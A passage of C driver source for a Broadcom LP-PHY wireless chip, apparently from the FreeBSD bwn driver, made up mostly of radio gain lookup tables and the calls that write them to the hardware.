0x00061547, 0x0005b598, 0x000565ec, 0x00051646, 0x0004d6a5, 0x0004870a, 0x00044775, 0x000407e6, 0x0003d85e, 0x000398dd, 0x00036963, 0x000339f2, 0x00030a89, 0x0002db28 }; static const uint16_t auxgainidx_a0[] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0002, 0x0014, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0002, 0x0014 }; static const uint32_t gainval_a0[] = { 0x00000008, 0x0000000e, 0x00000014, 0x0000001a, 0x000000fb, 0x00000004, 0x00000008, 0x0000000d, 0x00000001, 0x00000004, 0x00000007, 0x0000000a, 0x0000000d, 0x00000010, 0x00000012, 0x00000015, 0x00000000, 0x00000006, 0x0000000c, 0x00000000, 0x00000000, 0x00000000, 0x00000012, 0x00000000, 0x00000000, 0x00000000, 0x00000018, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000001e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000003, 0x00000006, 0x00000009, 0x0000000c, 0x0000000f, 0x00000012, 0x00000015, 0x00000018, 0x0000001b, 0x0000001e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000000f, 0x000000f7, 0x00000000, 0x00000000 }; static const uint16_t gain_a0[] = { 0x0000, 0x0002, 0x0004, 0x0006, 0x0007, 0x0008, 0x000a, 0x000b, 0x000c, 0x000e, 0x000f, 0x0010, 0x0012, 0x0013, 0x0014, 0x0016, 0x0017, 0x001a, 0x001b, 0x001f, 0x0020, 0x0024, 0x0030, 0x0034, 0x0037, 0x003b, 0x003f, 0x0040, 0x0044, 0x0057, 0x005b, 0x005f, 0x00d7, 0x00db, 0x00df, 0x0157, 0x015b, 0x015f, 0x0357, 0x035b, 0x035f, 0x075f, 0x0b5f, 0x0f5f, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000 }; KASSERT(mac->mac_phy.rev < 2, ("%s:%d: fail", __func__, __LINE__)); for (i = 0; i < 704; i++) bwn_tab_write(mac, BWN_TAB_4(7, i), 0); bwn_tab_write_multi(mac, BWN_TAB_1(2, 0), N(bwn_tab_sigsq_tbl), bwn_tab_sigsq_tbl); bwn_tab_write_multi(mac, BWN_TAB_2(1, 0), N(noisescale), noisescale); bwn_tab_write_multi(mac, BWN_TAB_4(11, 0), N(filterctl), filterctl); bwn_tab_write_multi(mac, BWN_TAB_4(12, 0), N(psctl), psctl); bwn_tab_write_multi(mac, BWN_TAB_4(13, 0), N(gainidx), gainidx); bwn_tab_write_multi(mac, BWN_TAB_2(14, 0), N(auxgainidx), auxgainidx); bwn_tab_write_multi(mac, BWN_TAB_2(15, 0), N(swctl), swctl); bwn_tab_write_multi(mac, BWN_TAB_1(16, 0), N(hf), hf); bwn_tab_write_multi(mac, BWN_TAB_4(17, 0), N(gainval), gainval); bwn_tab_write_multi(mac, BWN_TAB_2(18, 0), N(gain), gain); bwn_tab_write_multi(mac, BWN_TAB_1(6, 0), N(bwn_tab_pllfrac_tbl), bwn_tab_pllfrac_tbl); bwn_tab_write_multi(mac, BWN_TAB_2(0, 0), N(bwn_tabl_iqlocal_tbl), bwn_tabl_iqlocal_tbl); bwn_tab_write_multi(mac, BWN_TAB_4(9, 0), N(papdeps), papdeps); bwn_tab_write_multi(mac, BWN_TAB_4(10, 0), N(papdmult), papdmult); if ((siba_get_chipid(sc->sc_dev) == 0x4325) && (siba_get_chiprev(sc->sc_dev) == 0)) { bwn_tab_write_multi(mac, BWN_TAB_4(13, 0), N(gainidx_a0), gainidx_a0); bwn_tab_write_multi(mac, BWN_TAB_2(14, 0), N(auxgainidx_a0), auxgainidx_a0); bwn_tab_write_multi(mac, BWN_TAB_4(17, 0), N(gainval_a0), gainval_a0); bwn_tab_write_multi(mac, BWN_TAB_2(18, 0), N(gain_a0), gain_a0); } } static void bwn_phy_lp_tblinit_txgain(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static struct bwn_txgain_entry txgain_r2[] = { { 255, 255, 203, 0, 152 }, { 255, 255, 203, 0, 147 }, { 255, 255, 203, 0, 143 }, { 255, 255, 203, 0, 139 }, { 255, 255, 203, 0, 135 }, { 255, 255, 203, 0, 131 }, { 255, 255, 203, 0, 128 }, { 255, 255, 203, 0, 124 }, { 255, 255, 203, 0, 121 }, { 255, 255, 203, 0, 117 }, { 255, 255, 203, 0, 114 }, { 255, 255, 203, 0, 111 }, { 255, 255, 203, 0, 107 }, { 255, 255, 203, 0, 104 }, { 255, 255, 203, 0, 101 }, { 255, 255, 203, 0, 99 }, { 255, 255, 203, 0, 96 }, { 255, 255, 203, 0, 93 }, { 255, 255, 203, 0, 90 }, { 255, 255, 203, 0, 88 }, { 255, 255, 203, 0, 85 }, { 255, 255, 203, 0, 83 }, { 255, 255, 203, 0, 81 }, { 255, 255, 203, 0, 78 }, { 255, 255, 203, 0, 76 }, { 255, 255, 203, 0, 74 }, { 255, 255, 203, 0, 72 }, { 255, 255, 203, 0, 70 }, { 255, 255, 203, 0, 68 }, { 255, 255, 203, 0, 66 }, { 255, 255, 203, 0, 64 }, { 255, 255, 197, 0, 64 }, { 255, 255, 192, 0, 64 }, { 255, 255, 186, 0, 64 }, { 255, 255, 181, 0, 64 }, { 255, 255, 176, 0, 64 }, { 255, 255, 171, 0, 64 }, { 255, 255, 166, 0, 64 }, { 255, 255, 161, 0, 64 }, { 255, 255, 157, 0, 64 }, { 255, 255, 152, 0, 64 }, { 255, 255, 148, 0, 64 }, { 255, 255, 144, 0, 64 }, { 255, 255, 140, 0, 64 }, { 255, 255, 136, 0, 64 }, { 255, 255, 132, 0, 64 }, { 255, 255, 128, 0, 64 }, { 255, 255, 124, 0, 64 }, { 255, 255, 121, 0, 64 }, { 255, 255, 117, 0, 64 }, { 255, 255, 114, 0, 64 }, { 255, 255, 111, 0, 64 }, { 255, 255, 108, 0, 64 }, { 255, 255, 105, 0, 64 }, { 255, 255, 102, 0, 64 }, { 255, 255, 99, 0, 64 }, { 255, 255, 96, 0, 64 }, { 255, 255, 93, 0, 64 }, { 255, 255, 91, 0, 64 }, { 255, 255, 88, 0, 64 }, { 255, 255, 86, 0, 64 }, { 255, 255, 83, 0, 64 }, { 255, 255, 81, 0, 64 }, { 255, 255, 79, 0, 64 }, { 255, 255, 76, 0, 64 }, { 255, 255, 74, 0, 64 }, { 255, 255, 72, 0, 64 }, { 255, 255, 70, 0, 64 }, { 255, 255, 68, 0, 64 }, { 255, 255, 66, 0, 64 }, { 255, 255, 64, 0, 64 }, { 255, 248, 64, 0, 64 }, { 255, 248, 62, 0, 64 }, { 255, 241, 62, 0, 64 }, { 255, 241, 60, 0, 64 }, { 255, 234, 60, 0, 64 }, { 255, 234, 59, 0, 64 }, { 255, 227, 59, 0, 64 }, { 255, 227, 57, 0, 64 }, { 255, 221, 57, 0, 64 }, { 255, 221, 55, 0, 64 }, { 255, 215, 55, 0, 64 }, { 255, 215, 54, 0, 64 }, { 255, 208, 54, 0, 64 }, { 255, 208, 52, 0, 64 }, { 255, 203, 52, 0, 64 }, { 255, 203, 51, 0, 64 }, { 255, 197, 51, 0, 64 }, { 255, 197, 49, 0, 64 }, { 255, 191, 49, 0, 64 }, { 255, 191, 48, 0, 64 }, { 255, 186, 48, 0, 64 }, { 255, 186, 47, 0, 64 }, { 255, 181, 47, 0, 64 }, { 255, 181, 45, 0, 64 }, { 255, 175, 45, 0, 64 }, { 255, 175, 44, 0, 64 }, { 255, 170, 44, 0, 64 }, { 255, 170, 43, 0, 64 }, { 255, 166, 43, 0, 64 }, { 255, 166, 42, 0, 64 }, { 255, 161, 42, 0, 64 }, { 255, 161, 40, 0, 64 }, { 255, 156, 40, 0, 64 }, { 255, 156, 39, 0, 64 }, { 255, 152, 39, 0, 64 }, { 255, 152, 38, 0, 64 }, { 255, 148, 38, 0, 64 }, { 255, 148, 37, 0, 64 }, { 255, 143, 37, 0, 64 }, { 255, 143, 36, 0, 64 }, { 255, 139, 36, 0, 64 }, { 255, 139, 35, 0, 64 }, { 255, 135, 35, 0, 64 }, { 255, 135, 34, 0, 64 }, { 255, 132, 34, 0, 64 }, { 255, 132, 33, 0, 64 }, { 255, 128, 33, 0, 64 }, { 255, 128, 32, 0, 64 }, { 255, 124, 32, 0, 64 }, { 255, 124, 31, 0, 64 }, { 255, 121, 31, 0, 64 }, { 255, 121, 30, 0, 64 }, { 255, 117, 30, 0, 64 }, { 255, 117, 29, 0, 64 }, { 255, 114, 29, 0, 64 }, { 255, 114, 29, 0, 64 }, { 255, 111, 29, 0, 64 }, }; static struct bwn_txgain_entry txgain_2ghz_r2[] = { { 7, 99, 255, 0, 64 }, { 7, 96, 255, 0, 64 }, { 7, 93, 255, 0, 64 }, { 7, 90, 255, 0, 64 }, { 7, 88, 255, 0, 64 }, { 7, 85, 255, 0, 64 }, { 7, 83, 255, 0, 64 }, { 7, 81, 255, 0, 64 }, { 7, 78, 255, 0, 64 }, { 7, 76, 255, 0, 64 }, { 7, 74, 255, 0, 64 }, { 7, 72, 255, 0, 64 }, { 7, 70, 255, 0, 64 }, { 7, 68, 255, 0, 64 }, { 7, 66, 255, 0, 64 }, { 7, 64, 255, 0, 64 }, { 7, 64, 255, 0, 64 }, { 7, 62, 255, 0, 64 }, { 7, 62, 248, 0, 64 }, { 7, 60, 248, 0, 64 }, { 7, 60, 241, 0, 64 }, { 7, 59, 241, 0, 64 }, { 7, 59, 234, 0, 64 }, { 7, 57, 234, 0, 64 }, { 7, 57, 227, 0, 64 }, { 7, 55, 227, 0, 64 }, { 7, 55, 221, 0, 64 }, { 7, 54, 221, 0, 64 }, { 7, 54, 215, 0, 64 }, { 7, 52, 215, 0, 64 }, { 7, 52, 208, 0, 64 }, { 7, 51, 208, 0, 64 }, { 7, 51, 203, 0, 64 }, { 7, 49, 203, 0, 64 }, { 7, 49, 197, 0, 64 }, { 7, 48, 197, 0, 64 }, { 7, 48, 191, 0, 64 }, { 7, 47, 191, 0, 64 }, { 7, 47, 186, 0, 64 }, { 7, 45, 186, 0, 64 }, { 7, 45, 181, 0, 64 }, { 7, 44, 181, 0, 64 }, { 7, 44, 175, 0, 64 }, { 7, 43, 175, 0, 64 }, { 7, 43, 170, 0, 64 }, { 7, 42, 170, 0, 64 }, { 7, 42, 166, 0, 64 }, { 7, 40, 166, 0, 64 }, { 7, 40, 161, 0, 64 }, { 7, 39, 161, 0, 64 }, { 7, 39, 156, 0, 64 }, { 7, 38, 156, 0, 64 }, { 7, 38, 152, 0, 64 }, { 7, 37, 152, 0, 64 }, { 7, 37, 148, 0, 64 }, { 7, 36, 148, 0, 64 }, { 7, 36, 143, 0, 64 }, { 7, 35, 143, 0, 64 }, { 7, 35, 139, 0, 64 }, { 7, 34, 139, 0, 64 }, { 7, 34, 135, 0, 64 }, { 7, 33, 135, 0, 64 }, { 7, 33, 132, 0, 64 }, { 7, 32, 132, 0, 64 }, { 7, 32, 128, 0, 64 }, { 7, 31, 128, 0, 64 }, { 7, 31, 124, 0, 64 }, { 7, 30, 124, 0, 64 }, { 7, 30, 121, 0, 64 }, { 7, 29, 121, 0, 64 }, { 7, 29, 117, 0, 64 }, { 7, 29, 117, 0, 64 }, { 7, 29, 114, 0, 64 }, { 7, 28, 114, 0, 64 }, { 7, 28, 111, 0, 64 }, { 7, 27, 111, 0, 64 }, { 7, 27, 108, 0, 64 }, { 7, 26, 108, 0, 64 }, { 7, 26, 104, 0, 64 }, { 7, 25, 104, 0, 64 }, { 7, 25, 102, 0, 64 }, { 7, 25, 102, 0, 64 }, { 7, 25, 99, 0, 64 }, { 7, 24, 99, 0, 64 }, { 7, 24, 96, 0, 64 }, { 7, 23, 96, 0, 64 }, { 7, 23, 93, 0, 64 }, { 7, 23, 93, 0, 64 }, { 7, 23, 90, 0, 64 }, { 7, 22, 90, 0, 64 }, { 7, 22, 88, 0, 64 }, { 7, 21, 88, 0, 64 }, { 7, 21, 85, 0, 64 }, { 7, 21, 85, 0, 64 }, { 7, 21, 83, 0, 64 }, { 7, 20, 83, 0, 64 }, { 7, 20, 81, 0, 64 }, { 7, 20, 81, 0, 64 }, { 7, 20, 78, 0, 64 }, { 7, 19, 78, 0, 64 }, { 7, 19, 76, 0, 64 }, { 7, 19, 76, 0, 64 }, { 7, 19, 74, 0, 64 }, { 7, 18, 74, 0, 64 }, { 7, 18, 72, 0, 64 }, { 7, 18, 72, 0, 64 }, { 7, 18, 70, 0, 64 }, { 7, 17, 70, 0, 64 }, { 7, 17, 68, 0, 64 }, { 7, 17, 68, 0, 64 }, { 7, 17, 66, 0, 64 }, { 7, 16, 66, 0, 64 }, { 7, 16, 64, 0, 64 }, { 7, 16, 64, 0, 64 }, { 7, 16, 62, 0, 64 }, { 7, 15, 62, 0, 64 }, { 7, 15, 60, 0, 64 }, { 7, 15, 60, 0, 64 }, { 7, 15, 59, 0, 64 }, { 7, 14, 59, 0, 64 }, { 7, 14, 57, 0, 64 }, { 7, 14, 57, 0, 64 }, { 7, 14, 55, 0, 64 }, { 7, 14, 55, 0, 64 }, { 7, 14, 54, 0, 64 }, { 7, 13, 54, 0, 64 }, { 7, 13, 52, 0, 64 }, { 7, 13, 52, 0, 64 }, }; static struct bwn_txgain_entry txgain_5ghz_r2[] = { { 255, 255, 255, 0, 152 }, { 255, 255, 255, 0, 147 }, { 255, 255, 255, 0, 143 }, { 255, 255, 255, 0, 139 }, { 255, 255, 255, 0, 135 }, { 255, 255, 255, 0, 131 }, { 255, 255, 255, 0, 128 }, { 255, 255, 255, 0, 124 }, { 255, 255, 255, 0, 121 }, { 255, 255, 255, 0, 117 }, { 255, 255, 255, 0, 114 }, { 255, 255, 255, 0, 111 }, { 255, 255, 255, 0, 107 }, { 255, 255, 255, 0, 104 }, { 255, 255, 255, 0, 101 }, { 255, 255, 255, 0, 99 }, { 255, 255, 255, 0, 96 }, { 255, 255, 255, 0, 93 }, { 255, 255, 255, 0, 90 }, { 255, 255, 255, 0, 88 }, { 255, 255, 255, 0, 85 }, { 255, 255, 255, 0, 83 }, { 255, 255, 255, 0, 81 }, { 255, 255, 255, 0, 78 }, { 255, 255, 255, 0, 76 }, { 255, 255, 255, 0, 74 }, { 255, 255, 255, 0, 72 }, { 255, 255, 255, 0, 70 }, { 255, 255, 255, 0, 68 }, { 255, 255, 255, 0, 66 }, { 255, 255, 255, 0, 64 }, { 255, 255, 248, 0, 64 }, { 255, 255, 241, 0, 64 }, { 255, 255, 234, 0, 64 }, { 255, 255, 227, 0, 64 }, { 255, 255, 221, 0, 64 }, { 255, 255, 215, 0, 64 }, { 255, 255, 208, 0, 64 }, { 255, 255, 203, 0, 64 }, { 255, 255, 197, 0, 64 }, { 255, 255, 191, 0, 64 }, { 255, 255, 186, 0, 64 }, { 255, 255, 181, 0, 64 }, { 255, 255, 175, 0, 64 }, { 255, 255, 170, 0, 64 }, { 255, 255, 166, 0, 64 }, { 255, 255, 161, 0, 64 }, { 255, 255, 156, 0, 64 }, { 255, 255, 152, 0, 64 }, { 255, 255, 148, 0, 64 }, { 255, 255, 143, 0, 64 }, { 255, 255, 139, 0, 64 }, { 255, 255, 135, 0, 64 }, { 255, 255, 132, 0, 64 }, { 255, 255, 128, 0, 64 }, { 255, 255, 124, 0, 64 }, { 255, 255, 121, 0, 64 }, { 255, 255, 117, 0, 64 }, { 255, 255, 114, 0, 64 }, { 255, 255, 111, 0, 64 }, { 255, 255, 108, 0, 64 }, { 255, 255, 104, 0, 64 }, { 255, 255, 102, 0, 64 }, { 255, 255, 99, 0, 64 }, { 255, 255, 96, 0, 64 }, { 255, 255, 93, 0, 64 }, { 255, 255, 90, 0, 64 }, { 255, 255, 88, 0, 64 }, { 255, 255, 85, 0, 64 }, { 255, 255, 83, 0, 64 }, { 255, 255, 81, 0, 64 }, { 255, 255, 78, 0, 64 }, { 255, 255, 76, 0, 64 }, { 255, 255, 74, 0, 64 }, { 255, 255, 72, 0, 64 }, { 255, 255, 70, 0, 64 }, { 255, 255, 68, 0, 64 }, { 255, 255, 66, 0, 64 }, { 255, 255, 64, 0, 64 }, { 255, 255, 64, 0, 64 }, { 255, 255, 62, 0, 64 }, { 255, 248, 62, 0, 64 }, { 255, 248, 60, 0, 64 }, { 255, 241, 60, 0, 64 }, { 255, 241, 59, 0, 64 }, { 255, 234, 59, 0, 64 }, { 255, 234, 57, 0, 64 }, { 255, 227, 57, 0, 64 }, { 255, 227, 55, 0, 64 }, { 255, 221, 55, 0, 64 }, { 255, 221, 54, 0, 64 }, { 255, 215, 54, 0, 64 }, { 255, 215, 52, 0, 64 }, { 255, 208, 52, 0, 64 }, { 255, 208, 51, 0, 64 }, { 255, 203, 51, 0, 64 }, { 255, 203, 49, 0, 64 }, { 255, 197, 49, 0, 64 }, { 255, 197, 48, 0, 64 }, { 255, 191, 48, 0, 64 }, { 255, 191, 47, 0, 64 }, { 255, 186, 47, 0, 64 }, { 255, 186, 45, 0, 64 }, { 255, 181, 45, 0, 64 }, { 255, 181, 44, 0, 64 }, { 255, 175, 44, 0, 64 }, { 255, 175, 43, 0, 64 }, { 255, 170, 43, 0, 64 }, { 255, 170, 42, 0, 64 }, { 255, 166, 42, 0, 64 }, { 255, 166, 40, 0, 64 }, { 255, 161, 40, 0, 64 }, { 255, 161, 39, 0, 64 }, { 255, 156, 39, 0, 64 }, { 255, 156, 38, 0, 64 }, { 255, 152, 38, 0, 64 }, { 255, 152, 37, 0, 64 }, { 255, 148, 37, 0, 64 }, { 255, 148, 36, 0, 64 }, { 255, 143, 36, 0, 64 }, { 255, 143, 35, 0, 64 }, { 255, 139, 35, 0, 64 }, { 255, 139, 34, 0, 64 }, { 255, 135, 34, 0, 64 }, { 255, 135, 33, 0, 64 }, { 255, 132, 33, 0, 64 }, { 255, 132, 32, 0, 64 }, { 255, 128, 32, 0, 64 } }; static struct bwn_txgain_entry txgain_r0[] = { { 7, 15, 14, 0, 152 }, { 7, 15, 14, 0, 147 }, { 7, 15, 14, 0, 143 }, { 7, 15, 14, 0, 139 }, { 7, 15, 14, 0, 135 }, { 7, 15, 14, 0, 131 }, { 7, 15, 14, 0, 128 }, { 7, 15, 14, 0, 124 }, { 7, 15, 14, 0, 121 }, { 7, 15, 14, 0, 117 }, { 7, 15, 14, 0, 114 }, { 7, 15, 14, 0, 111 }, { 7, 15, 14, 0, 107 }, { 7, 15, 14, 0, 104 }, { 7, 15, 14, 0, 101 }, { 7, 15, 14, 0, 99 }, { 7, 15, 14, 0, 96 }, { 7, 15, 14, 0, 93 }, { 7, 15, 14, 0, 90 }, { 7, 15, 14, 0, 88 }, { 7, 15, 14, 0, 85 }, { 7, 15, 14, 0, 83 }, { 7, 15, 14, 0, 81 }, { 7, 15, 14, 0, 78 }, { 7, 15, 14, 0, 76 }, { 7, 15, 14, 0, 74 }, { 7, 15, 14, 0, 72 }, { 7, 15, 14, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 59 }, { 7, 15, 14, 0, 57 }, { 7, 15, 13, 0, 72 }, { 7, 15, 13, 0, 70 }, { 7, 15, 13, 0, 68 }, { 7, 15, 13, 0, 66 }, { 7, 15, 13, 0, 64 }, { 7, 15, 13, 0, 62 }, { 7, 15, 13, 0, 60 }, { 7, 15, 13, 0, 59 }, { 7, 15, 13, 0, 57 }, { 7, 15, 12, 0, 71 }, { 7, 15, 12, 0, 69 }, { 7, 15, 12, 0, 67 }, { 7, 15, 12, 0, 65 }, { 7, 15, 12, 0, 63 }, { 7, 15, 12, 0, 62 }, { 7, 15, 12, 0, 60 }, { 7, 15, 12, 0, 58 }, { 7, 15, 12, 0, 57 }, { 7, 15, 11, 0, 70 }, { 7, 15, 11, 0, 68 }, { 7, 15, 11, 0, 66 }, { 7, 15, 11, 0, 65 }, { 7, 15, 11, 0, 63 }, { 7, 15, 11, 0, 61 }, { 7, 15, 11, 0, 59 }, { 7, 15, 11, 0, 58 }, { 7, 15, 10, 0, 71 }, { 7, 15, 10, 0, 69 }, { 7, 15, 10, 0, 67 }, { 7, 15, 10, 0, 65 }, { 7, 15, 10, 0, 63 }, { 7, 15, 10, 0, 61 }, { 7, 15, 10, 0, 60 }, { 7, 15, 10, 0, 58 }, { 7, 15, 10, 0, 56 }, { 7, 15, 9, 0, 70 }, { 7, 15, 9, 0, 68 }, { 7, 15, 9, 0, 66 }, { 7, 15, 9, 0, 64 }, { 7, 15, 9, 0, 62 }, { 7, 15, 9, 0, 60 }, { 7, 15, 9, 0, 59 }, { 7, 14, 9, 0, 72 }, { 7, 14, 9, 0, 70 }, { 7, 14, 9, 0, 68 }, { 7, 14, 9, 0, 66 }, { 7, 14, 9, 0, 64 }, { 7, 14, 9, 0, 62 }, { 7, 14, 9, 0, 60 }, { 7, 14, 9, 0, 59 }, { 7, 13, 9, 0, 72 }, { 7, 13, 9, 0, 70 }, { 7, 13, 9, 0, 68 }, { 7, 13, 9, 0, 66 }, { 7, 13, 9, 0, 64 }, { 7, 13, 9, 0, 63 }, { 7, 13, 9, 0, 61 }, { 7, 13, 9, 0, 59 }, { 7, 13, 9, 0, 57 }, { 7, 13, 8, 0, 72 }, { 7, 13, 8, 0, 70 }, { 7, 13, 8, 0, 68 }, { 7, 13, 8, 0, 66 }, { 7, 13, 8, 0, 64 }, { 7, 13, 8, 0, 62 }, { 7, 13, 8, 0, 60 }, { 7, 13, 8, 0, 59 }, { 7, 12, 8, 0, 72 }, { 7, 12, 8, 0, 70 }, { 7, 12, 8, 0, 68 }, { 7, 12, 8, 0, 66 }, { 7, 12, 8, 0, 64 }, { 7, 12, 8, 0, 62 }, { 7, 12, 8, 0, 61 }, { 7, 12, 8, 0, 59 }, { 7, 12, 7, 0, 73 }, { 7, 12, 7, 0, 71 }, { 7, 12, 7, 0, 69 }, { 7, 12, 7, 0, 67 }, { 7, 12, 7, 0, 65 }, { 7, 12, 7, 0, 63 }, { 7, 12, 7, 0, 61 }, { 7, 12, 7, 0, 59 }, { 7, 11, 7, 0, 72 }, { 7, 11, 7, 0, 70 }, { 7, 11, 7, 0, 68 }, { 7, 11, 7, 0, 66 }, { 7, 11, 7, 0, 65 }, { 7, 11, 7, 0, 63 }, { 7, 11, 7, 0, 61 }, { 7, 11, 7, 0, 59 }, { 7, 11, 6, 0, 73 }, { 7, 11, 6, 0, 71 } }; static struct bwn_txgain_entry txgain_2ghz_r0[] = { { 4, 15, 9, 0, 64 }, { 4, 15, 9, 0, 62 }, { 4, 15, 9, 0, 60 }, { 4, 15, 9, 0, 59 }, { 4, 14, 9, 0, 72 }, { 4, 14, 9, 0, 70 }, { 4, 14, 9, 0, 68 }, { 4, 14, 9, 0, 66 }, { 4, 14, 9, 0, 64 }, { 4, 14, 9, 0, 62 }, { 4, 14, 9, 0, 60 }, { 4, 14, 9, 0, 59 }, { 4, 13, 9, 0, 72 }, { 4, 13, 9, 0, 70 }, { 4, 13, 9, 0, 68 }, { 4, 13, 9, 0, 66 }, { 4, 13, 9, 0, 64 }, { 4, 13, 9, 0, 63 }, { 4, 13, 9, 0, 61 }, { 4, 13, 9, 0, 59 }, { 4, 13, 9, 0, 57 }, { 4, 13, 8, 0, 72 }, { 4, 13, 8, 0, 70 }, { 4, 13, 8, 0, 68 }, { 4, 13, 8, 0, 66 }, { 4, 13, 8, 0, 64 }, { 4, 13, 8, 0, 62 }, { 4, 13, 8, 0, 60 }, { 4, 13, 8, 0, 59 }, { 4, 12, 8, 0, 72 }, { 4, 12, 8, 0, 70 }, { 4, 12, 8, 0, 68 }, { 4, 12, 8, 0, 66 }, { 4, 12, 8, 0, 64 }, { 4, 12, 8, 0, 62 }, { 4, 12, 8, 0, 61 }, { 4, 12, 8, 0, 59 }, { 4, 12, 7, 0, 73 }, { 4, 12, 7, 0, 71 }, { 4, 12, 7, 0, 69 }, { 4, 12, 7, 0, 67 }, { 4, 12, 7, 0, 65 }, { 4, 12, 7, 0, 63 }, { 4, 12, 7, 0, 61 }, { 4, 12, 7, 0, 59 }, { 4, 11, 7, 0, 72 }, { 4, 11, 7, 0, 70 }, { 4, 11, 7, 0, 68 }, { 4, 11, 7, 0, 66 }, { 4, 11, 7, 0, 65 }, { 4, 11, 7, 0, 63 }, { 4, 11, 7, 0, 61 }, { 4, 11, 7, 0, 59 }, { 4, 11, 6, 0, 73 }, { 4, 11, 6, 0, 71 }, { 4, 11, 6, 0, 69 }, { 4, 11, 6, 0, 67 }, { 4, 11, 6, 0, 65 }, { 4, 11, 6, 0, 63 }, { 4, 11, 6, 0, 61 }, { 4, 11, 6, 0, 60 }, { 4, 10, 6, 0, 72 }, { 4, 10, 6, 0, 70 }, { 4, 10, 6, 0, 68 }, { 4, 10, 6, 0, 66 }, { 4, 10, 6, 0, 64 }, { 4, 10, 6, 0, 62 }, { 4, 10, 6, 0, 60 }, { 4, 10, 6, 0, 59 }, { 4, 10, 5, 0, 72 }, { 4, 10, 5, 0, 70 }, { 4, 10, 5, 0, 68 }, { 4, 10, 5, 0, 66 }, { 4, 10, 5, 0, 64 }, { 4, 10, 5, 0, 62 }, { 4, 10, 5, 0, 60 }, { 4, 10, 5, 0, 59 }, { 4, 9, 5, 0, 70 }, { 4, 9, 5, 0, 68 }, { 4, 9, 5, 0, 66 }, { 4, 9, 5, 0, 64 }, { 4, 9, 5, 0, 63 }, { 4, 9, 5, 0, 61 }, { 4, 9, 5, 0, 59 }, { 4, 9, 4, 0, 71 }, { 4, 9, 4, 0, 69 }, { 4, 9, 4, 0, 67 }, { 4, 9, 4, 0, 65 }, { 4, 9, 4, 0, 63 }, { 4, 9, 4, 0, 62 }, { 4, 9, 4, 0, 60 }, { 4, 9, 4, 0, 58 }, { 4, 8, 4, 0, 70 }, { 4, 8, 4, 0, 68 }, { 4, 8, 4, 0, 66 }, { 4, 8, 4, 0, 65 }, { 4, 8, 4, 0, 63 }, { 4, 8, 4, 0, 61 }, { 4, 8, 4, 0, 59 }, { 4, 7, 4, 0, 68 }, { 4, 7, 4, 0, 66 }, { 4, 7, 4, 0, 64 }, { 4, 7, 4, 0, 62 }, { 4, 7, 4, 0, 61 }, { 4, 7, 4, 0, 59 }, { 4, 7, 3, 0, 67 }, { 4, 7, 3, 0, 65 }, { 4, 7, 3, 0, 63 }, { 4, 7, 3, 0, 62 }, { 4, 7, 3, 0, 60 }, { 4, 6, 3, 0, 65 }, { 4, 6, 3, 0, 63 }, { 4, 6, 3, 0, 61 }, { 4, 6, 3, 0, 60 }, { 4, 6, 3, 0, 58 }, { 4, 5, 3, 0, 68 }, { 4, 5, 3, 0, 66 }, { 4, 5, 3, 0, 64 }, { 4, 5, 3, 0, 62 }, { 4, 5, 3, 0, 60 }, { 4, 5, 3, 0, 59 }, { 4, 5, 3, 0, 57 }, { 4, 4, 2, 0, 83 }, { 4, 4, 2, 0, 81 }, { 4, 4, 2, 0, 78 }, { 4, 4, 2, 0, 76 }, { 4, 4, 2, 0, 74 }, { 4, 4, 2, 0, 72 } }; static struct bwn_txgain_entry txgain_5ghz_r0[] = { { 7, 15, 15, 0, 99 }, { 7, 15, 15, 0, 96 }, { 7, 15, 15, 0, 93 }, { 7, 15, 15, 0, 90 }, { 7, 15, 15, 0, 88 }, { 7, 15, 15, 0, 85 }, { 7, 15, 15, 0, 83 }, { 7, 15, 15, 0, 81 }, { 7, 15, 15, 0, 78 }, { 7, 15, 15, 0, 76 }, { 7, 15, 15, 0, 74 }, { 7, 15, 15, 0, 72 }, { 7, 15, 15, 0, 70 }, { 7, 15, 15, 0, 68 }, { 7, 15, 15, 0, 66 }, { 7, 15, 15, 0, 64 }, { 7, 15, 15, 0, 62 }, { 7, 15, 15, 0, 60 }, { 7, 15, 15, 0, 59 }, { 7, 15, 15, 0, 57 }, { 7, 15, 15, 0, 55 }, { 7, 15, 14, 0, 72 }, { 7, 15, 14, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 58 }, { 7, 15, 14, 0, 56 }, { 7, 15, 14, 0, 55 }, { 7, 15, 13, 0, 71 }, { 7, 15, 13, 0, 69 }, { 7, 15, 13, 0, 67 }, { 7, 15, 13, 0, 65 }, { 7, 15, 13, 0, 63 }, { 7, 15, 13, 0, 62 }, { 7, 15, 13, 0, 60 }, { 7, 15, 13, 0, 58 }, { 7, 15, 13, 0, 56 }, { 7, 15, 12, 0, 72 }, { 7, 15, 12, 0, 70 }, { 7, 15, 12, 0, 68 }, { 7, 15, 12, 0, 66 }, { 7, 15, 12, 0, 64 }, { 7, 15, 12, 0, 62 }, { 7, 